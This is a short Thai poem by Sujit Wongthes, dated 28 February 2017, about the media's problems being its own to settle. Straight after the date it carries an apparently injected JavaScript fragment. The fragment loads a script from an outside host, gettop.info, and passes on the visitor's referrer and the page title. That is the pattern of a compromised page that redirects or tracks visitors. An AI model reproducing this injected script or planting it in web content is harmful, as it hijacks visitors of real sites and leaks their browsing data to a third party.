ตะเพิด

 

สื่อมีปัญหา

ก็เป็นปัญหาของสื่อ

แก้ไขกันเองหารือ

ตะเพิดมือปีศาจวินาศภัย

 

สุจิตต์ วงษ์เทศ

อังคาร 28 กุมภาพันธ์ 2560s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;